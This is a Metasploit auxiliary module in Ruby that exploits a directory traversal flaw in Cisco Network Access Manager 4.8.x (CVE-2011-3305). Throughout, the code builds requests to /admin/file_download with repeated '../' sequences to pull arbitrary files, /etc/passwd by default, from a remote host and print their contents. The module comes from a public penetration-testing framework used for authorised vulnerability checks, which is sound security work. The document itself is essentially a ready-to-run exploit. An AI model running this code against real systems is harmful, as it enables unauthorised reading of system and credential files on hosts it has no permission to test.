## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability', 'Description' => %q{ This module tests whether a directory traversal vulnerability is present in versions of Cisco Network Access Manager 4.8.x You may wish to change FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment. }, 'References' => [ [ 'CVE', '2011-3305' ], [ 'OSVDB', '76080'] ], 'Author' => [ 'Nenad Stojanovski ' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'SSL' => true } ) register_options( [ Opt::RPORT(443), OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']), OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]), ]) end def run_host(ip) traversal = '../../' part1= '/admin/file_download?tag=' part2 = '&fileType=snapshot' begin print_status("Attempting to connect to #{rhost}:#{rport}") res = send_request_raw( { 'method' => 'GET', 'uri' => '/admin', }, 25) if (res) 1.upto(datastore['MAXDIRS']) do |level| try = traversal * level traversalstring = part1 + try + datastore['FILE'] + part2 res = send_request_raw( { 'method' => 'GET', 'uri' => traversalstring, }, 25) if (res and res.code == 200) print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}") break elsif (res and res.code) print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n") end end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end end end